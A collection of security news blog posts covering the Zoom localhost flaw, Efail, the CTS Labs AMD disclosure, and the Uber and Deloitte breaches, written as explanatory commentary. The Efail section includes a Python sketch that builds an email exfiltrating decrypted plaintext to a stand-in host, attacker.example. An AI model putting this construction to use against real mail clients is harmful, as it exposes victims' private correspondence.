SSL and internet security news

Zoom Vulnerability

The Zoom conferencing app has a vulnerability that allows someone to remotely take over the computer’s camera.

It’s a bad vulnerability, made worse by the fact that it remains even if you uninstall the Zoom app:

This vulnerability allows any website to forcibly join a user to a Zoom call, with their video camera activated, without the user’s permission.

On top of this, this vulnerability would have allowed any webpage to DOS (Denial of Service) a Mac by repeatedly joining a user to an invalid call.

Additionally, if you’ve ever installed the Zoom client and then uninstalled it, you still have a localhost web server on your machine that will happily re-install the Zoom client for you, without requiring any user interaction on your behalf besides visiting a webpage. This re-install ‘feature’ continues to work to this day.
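If you want to check whether that leftover localhost server is still present on your own machine, a minimal sketch follows. It assumes, per the public disclosure, that the server listened on localhost port 19421; an open port is only a hint to investigate further, since another application could be using it.

```python
import socket

# Port the leftover Zoom web server reportedly listened on, per the
# public disclosure. Treat this number as an assumption of the sketch.
ZOOM_LOCALHOST_PORT = 19421

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.settimeout(1.0)
    port_open = s.connect_ex(("127.0.0.1", ZOOM_LOCALHOST_PORT)) == 0

if port_open:
    # An open port is only a hint: some other program could be using it.
    print(f"Something is listening on localhost:{ZOOM_LOCALHOST_PORT}; investigate.")
else:
    print(f"Nothing is listening on localhost:{ZOOM_LOCALHOST_PORT}.")
```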

Zoom didn’t take the vulnerability seriously:

This vulnerability was originally responsibly disclosed on March 26, 2019. This initial report included a proposed description of a ‘quick fix’ Zoom could have implemented by simply changing their server logic. It took Zoom 10 days to confirm the vulnerability. The first actual meeting about how the vulnerability would be patched occurred on June 11th, 2019, only 18 days before the end of the 90-day public disclosure deadline. During this meeting, the details of the vulnerability were confirmed and Zoom’s planned solution was discussed. However, I was very easily able to spot and describe bypasses in their planned fix. At this point, Zoom was left with 18 days to resolve the vulnerability. On June 24th after 90 days of waiting, the last day before the public disclosure deadline, I discovered that Zoom had only implemented the ‘quick fix’ solution originally suggested.

This is why we disclose vulnerabilities. Now, finally, Zoom is taking this seriously and fixing it for real.

The Importance of Protecting Cybersecurity Whistleblowers

Interesting essay arguing that we need better legislation to protect cybersecurity whistleblowers.

Congress should act to protect cybersecurity whistleblowers because information security has never been so important, or so challenging. In the wake of a barrage of shocking revelations about data breaches and companies’ mishandling of customer data, a bipartisan consensus has emerged in support of legislation to give consumers more control over their personal information, require companies to disclose how they collect and use consumer data, and impose penalties for data breaches and misuse of consumer data. The Federal Trade Commission (“FTC”) has been held out as the best agency to implement this new regulation. But for any such legislation to be effective, it must protect the courageous whistleblowers who risk their careers to expose data breaches and unauthorized use of consumers’ private data.

Whistleblowers strengthen regulatory regimes, and cybersecurity regulation would be no exception. Republican and Democratic leaders from the executive and legislative branches have extolled the virtues of whistleblowers. High-profile cases abound. Recently, Christopher Wylie exposed Cambridge Analytica’s misuse of Facebook user data to manipulate voters, including its apparent theft of data from 50 million Facebook users as part of a psychological profiling campaign. Though additional research is needed, the existing empirical data reinforces the consensus that whistleblowers help prevent, detect, and remedy misconduct. Therefore it is reasonable to conclude that protecting and incentivizing whistleblowers could help the government address the many complex challenges facing our nation’s information systems.

Leaked NSA Hacking Tools

In 2016, a hacker group calling itself the Shadow Brokers released a trove of 2013 NSA hacking tools and related documents. Most people believe it is a front for the Russian government. Since then, the vulnerabilities and tools have been used by both governments and criminals, and have called into serious question the NSA’s ability to secure its own cyberweapons.

Now we have learned that the Chinese used the tools fourteen months before the Shadow Brokers released them.

Does this mean that both the Chinese and the Russians stole the same set of NSA tools? Did the Russians steal them from the Chinese, who stole them from us? Did it work the other way? I don’t think anyone has any idea. But this certainly illustrates how dangerous it is for the NSA — or US Cyber Command — to hoard zero-day vulnerabilities.

The Effects of GDPR’s 72-Hour Notification Rule

The EU’s GDPR regulation requires companies to report a breach within 72 hours. Alex Stamos, the former Facebook CISO who is now at Stanford University, points out how this can be a problem:

Interesting impact of the GDPR 72-hour deadline: companies announcing breaches before investigations are complete.

1) Announce & cop to max possible impacted users.
2) Everybody is confused on actual impact, lots of rumors.
3) A month later truth is included in official filing.

Last week’s Facebook hack is his example.

The Twitter conversation continues as various people try to figure out if the European law allows a delay in order to work with law enforcement to catch the hackers, or if a company can report the breach privately with some assurance that it won’t accidentally leak to the public.

The other interesting impact is the foreclosing of any possible coordination with law enforcement. I once ran response for a breach of a financial institution, which wasn’t disclosed for months as the company was working with the USSS to lure the attackers into a trap. It worked.

[…]

The assumption that anything you share with an EU DPA stays confidential in the current media environment has been disproven by my personal experience.

This is a perennial problem: we can get information quickly, or we can get accurate information. It’s hard to get both at the same time.

E-Mail Vulnerabilities and Disclosure

Last week, researchers disclosed vulnerabilities in a large number of encrypted e-mail clients: specifically, those that use OpenPGP and S/MIME, including Thunderbird and Apple Mail. These are serious vulnerabilities: An attacker who can alter mail sent to a vulnerable client can trick that client into sending a copy of the plaintext to a web server controlled by that attacker. The story of these vulnerabilities and the tale of how they were disclosed illustrate some important lessons about security vulnerabilities in general and e-mail security in particular.

But first, if you use PGP or S/MIME to encrypt e-mail, you need to check the list on this page and see if you are vulnerable. If you are, check with the vendor to see if they’ve fixed the vulnerability. (Note that some early patches turned out not to fix the vulnerability.) If not, stop using the encrypted e-mail program entirely until it’s fixed. Or, if you know how to do it, turn off your e-mail client’s ability to process HTML e-mail or — even better — stop decrypting e-mails from within the client. There’s even more complex advice for more sophisticated users, but if you’re one of those, you don’t need me to explain this to you.

Consider your encrypted e-mail insecure until this is fixed.
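To make the attack mechanics concrete, here is a minimal sketch of the “direct exfiltration” variant of the attack, built with Python’s standard email library. The addresses and ciphertext are placeholders, and the encrypted part is simplified to plain text rather than a full PGP/MIME multipart/encrypted structure:

```python
# A simplified sketch of Efail-style direct exfiltration: the attacker
# sandwiches a captured ciphertext between two HTML parts that open and
# close an <img> tag. A vulnerable client decrypts the middle part,
# renders all three parts as one HTML document, and then requests an
# "image" whose URL now contains the plaintext, delivering it to the
# attacker's server. All names and the ciphertext are placeholders.
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

captured_ciphertext = (
    "-----BEGIN PGP MESSAGE-----\n"
    "...captured ciphertext goes here...\n"
    "-----END PGP MESSAGE-----\n"
)

msg = MIMEMultipart("mixed")
msg["From"] = "attacker@attacker.example"
msg["To"] = "victim@victim.example"
msg["Subject"] = "Efail direct-exfiltration sketch"

# Part 1: an HTML part containing an unterminated <img> tag.
msg.attach(MIMEText('<img src="http://attacker.example/', "html"))

# Part 2: the intercepted encrypted message, re-sent to the victim.
# (A real PGP/MIME message uses a multipart/encrypted structure; a
# plain-text part keeps this sketch short.)
msg.attach(MIMEText(captured_ciphertext, "plain"))

# Part 3: close the quote and the tag, so the decrypted plaintext
# ends up embedded in the image URL.
msg.attach(MIMEText('">', "html"))

print(msg.as_string())
```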

All software contains security vulnerabilities, and one of the primary ways we all improve our security is by researchers discovering those vulnerabilities and vendors patching them. It’s a weird system: Corporate researchers are motivated by publicity, academic researchers by publication credentials, and just about everyone by individual fame and the small bug bounties paid by some vendors.

Software vendors, on the other hand, are motivated to fix vulnerabilities by the threat of public disclosure. Without the threat of eventual publication, vendors are likely to ignore researchers and delay patching. This happened a lot in the 1990s, and even today, vendors often use legal tactics to try to block publication. It makes sense; they look bad when their products are pronounced insecure.

Over the past few years, researchers have started to choreograph vulnerability announcements to make a big press splash. Clever names — the e-mail vulnerability is called “Efail” — websites, and cute logos are now common. Key reporters are given advance information about the vulnerabilities. Sometimes advance teasers are released. Vendors are now part of this process, trying to announce their patches at the same time the vulnerabilities are announced.

This simultaneous announcement is best for security. While it’s always possible that some organization — either government or criminal — has independently discovered and is using the vulnerability before the researchers go public, use of the vulnerability is essentially guaranteed after the announcement. The time period between announcement and patching is the most dangerous, and everyone except would-be attackers wants to minimize it.

Things get much more complicated when multiple vendors are involved. In this case, Efail isn’t a vulnerability in a particular product; it’s a vulnerability in a standard that is used in dozens of different products. As such, the researchers had to ensure both that everyone knew about the vulnerability in time to fix it and that no one leaked the vulnerability to the public during that time. As you can imagine, that’s close to impossible.

Efail was discovered sometime last year, and the researchers alerted dozens of different companies between last October and March. Some companies took the news more seriously than others. Most patched. Amazingly, news about the vulnerability didn’t leak until the day before the scheduled announcement date. Two days before the scheduled release, the researchers unveiled a teaser — honestly, a really bad idea — which resulted in details leaking.

After the leak, the Electronic Frontier Foundation posted a notice about the vulnerability without details. The organization has been criticized for its announcement, but I am hard-pressed to find fault with its advice. (Note: I am a board member at EFF.) Then, the researchers published — and lots of press followed.

All of this speaks to the difficulty of coordinating vulnerability disclosure when it involves a large number of companies or — even more problematic — communities without clear ownership. And that’s what we have with OpenPGP. It’s even worse when the bug involves the interaction between different parts of a system. In this case, there’s nothing wrong with PGP or S/MIME in and of themselves. Rather, the vulnerability occurs because of the way many e-mail programs handle encrypted e-mail. GnuPG, an implementation of OpenPGP, decided that the bug wasn’t its fault and did nothing about it. This is arguably true, but irrelevant. They should fix it.

Expect more of these kinds of problems in the future. The Internet is shifting from a set of systems we deliberately use — our phones and computers — to a fully immersive Internet-of-things world that we live in 24/7. And like this e-mail vulnerability, vulnerabilities will emerge through the interactions of different systems. Sometimes it will be obvious who should fix the problem. Sometimes it won’t be. Sometimes it’ll be two secure systems that, when they interact in a particular way, cause an insecurity. In April, I wrote about a vulnerability that arose because Google and Netflix make different assumptions about e-mail addresses. I don’t even know who to blame for that one.
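For illustration, here is a sketch of the kind of mismatch involved, with hypothetical addresses: Gmail ignores dots in the local part of an address, while a service that compares address strings byte-for-byte treats the two spellings as different accounts.

```python
# Gmail treats dots in the local part as insignificant; a service that
# compares address strings literally does not. Both addresses below are
# hypothetical examples.
def gmail_canonical(address: str) -> str:
    """Collapse a Gmail address to the form Gmail actually delivers to."""
    local, _, domain = address.partition("@")
    if domain.lower() in ("gmail.com", "googlemail.com"):
        local = local.replace(".", "")
    return f"{local.lower()}@{domain.lower()}"

a = "jane.doe@gmail.com"
b = "janedoe@gmail.com"

print(a == b)                                    # False: literal string comparison
print(gmail_canonical(a) == gmail_canonical(b))  # True: both reach the same inbox
```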

It gets even worse. Our system of disclosure and patching assumes that vendors have the expertise and ability to patch their systems, but that simply isn’t true for many of the embedded and low-cost Internet of things software packages. They’re designed at a much lower cost, often by offshore teams that come together, create the software, and then disband; as a result, there simply isn’t anyone left around to receive vulnerability alerts from researchers and write patches. Even worse, many of these devices aren’t patchable at all. Right now, if you own a digital video recorder that’s vulnerable to being recruited for a botnet — remember Mirai from 2016? — the only way to patch it is to throw it away and buy a new one.

Patching is starting to fail, which means that we’re losing the best mechanism we have for improving software security at exactly the same time that software is gaining autonomy and physical agency. Many researchers and organizations, including myself, have proposed government regulations enforcing minimum security standards for Internet-of-things devices, including standards around vulnerability disclosure and patching. This would be expensive, but it’s hard to see any other viable alternative.

Getting back to e-mail, the truth is that it’s incredibly difficult to secure well. Not because the cryptography is hard, but because we expect e-mail to do so many things. We use it for correspondence, for conversations, for scheduling, and for record-keeping. I regularly search my 20-year e-mail archive. The PGP and S/MIME security protocols are outdated, needlessly complicated and have been difficult to use properly the whole time. If we could start again, we would design something better and more user-friendly, but the huge number of legacy applications that use the existing standards means that we can’t. I tell people that if they want to communicate securely with someone, they should use one of the secure messaging systems: Signal, Off-the-Record, or — if having one of those two on your system is itself suspicious — WhatsApp. Of course they’re not perfect, as last week’s announcement of a vulnerability (patched within hours) in Signal illustrates. And they’re not as flexible as e-mail, but that makes them easier to secure.

This essay previously appeared on Lawfare.com.

Israeli Security Company Attacks AMD by Publishing Zero-Day Exploits

Last week, the Israeli security company CTS Labs published a series of exploits against AMD chips. The publication came with the flashy website, detailed whitepaper, cool vulnerability names — RYZENFALL, MASTERKEY, FALLOUT, and CHIMERA — and logos we’ve come to expect from these sorts of things. What’s new is that the company only gave AMD a day’s notice, which breaks with every norm about responsible disclosure. CTS Labs didn’t release details of the exploits, only high-level descriptions of the vulnerabilities, but it is probably still enough for others to reproduce their results. This is incredibly irresponsible of the company.

Moreover, the vulnerabilities are kind of meh. Nicholas Weaver explains:

In order to use any of the four vulnerabilities, an attacker must already have almost complete control over the machine. For most purposes, if the attacker already has this access, we would generally say they’ve already won. But these days, modern computers at least attempt to protect against a rogue operating system by having separate secure subprocessors. CTS Labs discovered the vulnerabilities when they looked at AMD’s implementation of the secure subprocessor to see if an attacker, having already taken control of the host operating system, could bypass these last lines of defense.

In a “Clarification,” CTS Labs kind of agrees:

The vulnerabilities described in amdflaws.com could give an attacker that has already gained initial foothold into one or more computers in the enterprise a significant advantage against IT and security teams.

The only thing the attacker would need after the initial local compromise is local admin privileges and an affected machine. To clarify misunderstandings — there is no need for physical access, no digital signatures, no additional vulnerability to reflash an unsigned BIOS. Buy a computer from the store, run the exploits as admin — and they will work (on the affected models as described on the site).

The weirdest thing about this story is that CTS Labs describes one of the vulnerabilities, Chimera, as a backdoor. Although it doesn’t come out and say that this was deliberately planted by someone, it does make the point that the chips were designed in Taiwan. This is an incredible accusation, and honestly needs more evidence before we can evaluate it.

The upshot of all of this is that CTS Labs played this for maximum publicity: over-hyping its results and minimizing AMD’s ability to respond. And it may have an ulterior motive:

But CTS’s website touting AMD’s flaws also contained a disclaimer that threw some shadows on the company’s motives: “Although we have a good faith belief in our analysis and believe it to be objective and unbiased, you are advised that we may have, either directly or indirectly, an economic interest in the performance of the securities of the companies whose products are the subject of our reports,” reads one line. WIRED asked in a follow-up email to CTS whether the company holds any financial positions designed to profit from the release of its AMD research specifically. CTS didn’t respond.

We all need to demand better behavior from security researchers. I know that any publicity is good publicity, but I am pleased to see the stories critical of CTS Labs outnumbering the stories praising it.

Security Breaches Don’t Affect Stock Price

Interesting research: “Long-term market implications of data breaches, not,” by Russell Lange and Eric W. Burger.

Abstract: This report assesses the impact disclosure of data breaches has on the total returns and volatility of the affected companies’ stock, with a focus on the results relative to the performance of the firms’ peer industries, as represented through selected indices rather than the market as a whole. Financial performance is considered over a range of dates from 3 days post-breach through 6 months post-breach, in order to provide a longer-term perspective on the impact of the breach announcement.

Key findings (a sketch of the return-differential calculation follows the list):

  • While the difference in stock price between the sampled breached companies and their peers was negative (-1.13%) in the first 3 days following announcement of a breach, by the 14th day the return difference had rebounded to +0.05%, and on average remained positive through the period assessed.

  • For the differences in the breached companies’ betas and the beta of their peer sets, the difference in the means of 8 months pre-breach versus post-breach was not meaningful at the 90-, 180-, and 360-day post-breach periods.

  • For the differences in the breached companies’ beta correlations against the peer indices pre- and post-breach, the difference in the means of the rolling 60-day correlation 8 months pre-breach versus post-breach was not meaningful at the 90-, 180-, and 360-day post-breach periods.

  • In regression analysis, use of the number of accessed records, date, data sensitivity, and malicious versus accidental leak as variables failed to yield an R² greater than 16.15% for the response variables of 3-, 14-, 60-, and 90-day return differential, excess beta differential, and rolling beta correlation differential, indicating that the financial impact on breached companies was highly idiosyncratic.

  • Based on returns, the most impacted industries at the 3-day post-breach date were U.S. Financial Services, Transportation, and Global Telecom. At the 90-day post-breach date, the three most impacted industries were U.S. Financial Services, U.S. Healthcare, and Global Telecom.
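As a rough illustration of the headline metric, here is a sketch of the post-breach return differential against a peer index using pandas. The file name, column names, and breach date are hypothetical, and the study’s actual index construction is more involved:

```python
import pandas as pd

# Hypothetical daily closing prices for a breached firm and its peer
# index, in a CSV with columns: date, breached, peer_index.
prices = pd.read_csv("prices.csv", parse_dates=["date"], index_col="date")

breach_date = pd.Timestamp("2017-09-07")      # placeholder announcement date
post = prices.pct_change().loc[breach_date:]  # daily returns from the announcement on

def return_differential(days: int) -> float:
    """Cumulative return of the breached firm minus its peer index, N trading days out."""
    window = post.iloc[:days]
    cum = (1 + window).prod() - 1  # cumulative simple return per column
    return cum["breached"] - cum["peer_index"]

for days in (3, 14, 60, 90):
    print(f"{days:>2}-day return differential: {return_differential(days):+.2%}")
```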

The market isn’t going to fix this. If we want better security, we need to regulate the market.

Note: The article is behind a paywall. An older version is here. A similar article is here.

Uber Data Hack

Uber was hacked, losing data on 57 million driver and rider accounts. The company kept it quiet for over a year. The details are particularly damning:

The two hackers stole data about the company’s riders and drivers — including phone numbers, email addresses and names — from a third-party server and then approached Uber and demanded $100,000 to delete their copy of the data, the employees said.

Uber acquiesced to the demands, and then went further. The company tracked down the hackers and pushed them to sign nondisclosure agreements, according to the people familiar with the matter. To further conceal the damage, Uber executives also made it appear as if the payout had been part of a “bug bounty” — a common practice among technology companies in which they pay hackers to attack their software to test for soft spots.

And almost certainly illegal:

While it is not illegal to pay money to hackers, Uber may have violated several laws in its interaction with them.

By demanding that the hackers destroy the stolen data, Uber may have violated a Federal Trade Commission rule on breach disclosure that prohibits companies from destroying any forensic evidence in the course of their investigation.

The company may have also violated state breach disclosure laws by not disclosing the theft of Uber drivers’ stolen data. If the data stolen was not encrypted, Uber would have been required by California state law to disclose that driver’s license data from its drivers had been stolen in the course of the hacking.


Deloitte Hacked

The large accountancy firm Deloitte was hacked, losing client e-mails and files. The hackers had access inside the company’s networks for months. Deloitte is doing its best to downplay the severity of this hack, but Brian Krebs reports that the hack “involves the compromise of all administrator accounts at the company as well as Deloitte’s entire internal email system.”

So far, the hackers haven’t published all the data they stole.
